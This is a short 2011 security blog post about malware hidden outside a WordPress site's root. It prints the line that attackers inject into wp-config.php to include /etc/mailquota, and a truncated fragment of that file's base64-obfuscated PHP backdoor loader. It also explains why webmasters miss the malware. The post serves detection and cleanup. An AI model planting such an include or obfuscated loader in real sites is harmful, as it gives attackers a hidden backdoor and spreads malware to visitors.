Malware on /etc/mailquota

  • October 6, 2011

We are seeing an interesting trend lately. A site gets compromised and starts to distribute malware to its users. The webmaster (owner of the site) searches everywhere for malicious strings, and can’t find anything. Where can it be hidden?

It could be outside the root directory of your site. On many sites we’ve been analyzing over the last few days, they’ve been adding the following code in wp-config.php (yes, WordPress sites on shared hosts):

require( ABSPATH . “/../etc/mailquota”);

Interesting right? It is including mailquota which is not a PHP file. When you look at the file, you get a long string of encoded PHP:

ncftp /etc > cat mailquota
<?$GLOBALS[‘_1562346450_’]=Array(base64_decode(‘ZX’ .’Jy’ .’b3J’ .’fc’ .’mVwb3J0aW5′ .’n’),base64_decode(‘cHJlZ19t’ .’YXRj’ .’aA’ .’==’),base64_decode(‘cHJlZ19t’ .’YXRja’ .’A==’),base64_decode(‘c’ .’HJlZ19tYX’ .’Rja’ .’A==’),base64_decode(‘Z2V0aG9z’ .’dGJ5YWRk’ .’cg==’)); ..{$a=Array(‘QF45N1wuMTA3XC4xMzV8MTczXC4yMzBcLjEyOHw2NlwuMjI4XC4zNEA=’,

After being decoded, this does a bunch of nasty things (include a JavaScript malware, acts as a backdoor, etc).

The lesson here? Never limit yourself to your web site root directory when searching for malicious strings. They can be anywhere (even hidden as Apache modules).

Web site hacked? You think it is? Scan it here to double check: http://sitecheck.sucuri.net.
Need help cleaning up a site?

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags
Related Categories
You May Also Like